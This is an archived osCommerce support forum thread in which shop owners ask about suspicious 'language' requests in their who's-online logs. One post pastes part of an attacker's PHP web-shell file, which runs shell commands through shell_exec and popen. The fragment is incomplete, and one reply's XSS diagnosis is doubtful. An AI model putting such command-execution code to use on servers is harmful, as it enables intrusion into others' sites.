Jump to content
  • Checkout
  • Login
  • Get in touch


The e-commerce.

Virus attack that Links language to other site?


Recommended Posts

Just found this in my whos online list. How did it get there is it a virus?




Do not open the link to beforethehighway as it contains a virus. Any ideas on how to remove this or wher it might be found on the site?

Link to comment
Share on other sites

  • 6 months later...



we have currently a similar problem. When I look into the who's online page, there are often page requests like this






The content of the text-file is


echo "Mic22";
echo $eseguicmd;

function ex($cfe){
$res = '';
if (!empty($cfe)){
$res = join("n",$res);
$res = @shell_exec($cfe);
$res = @ob_get_contents();
$res = @ob_get_contents();
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
return $res;




may this be dangerous?




Link to comment
Share on other sites

Seems you have been hacked through XSS (cross site scripting). Either you are using an older version of osCommerce which had some vulnerabilities, or you are using one or more contributions which are vulnerable for XSS. It would be a good thing to update to the latest osCommerce version and check your contributions.


Maybe the above posters have some contributions in common?

Link to comment
Share on other sites

does an entry in the who-is-online like the above mean that the hack was successful or was it just a try?


Is it possible to forward requests with this to any site


maybe like


if length ($HTTP_GET_VARS['language'] )>2 



Link to comment
Share on other sites


This topic is now archived and is closed to further replies.

  • Create New...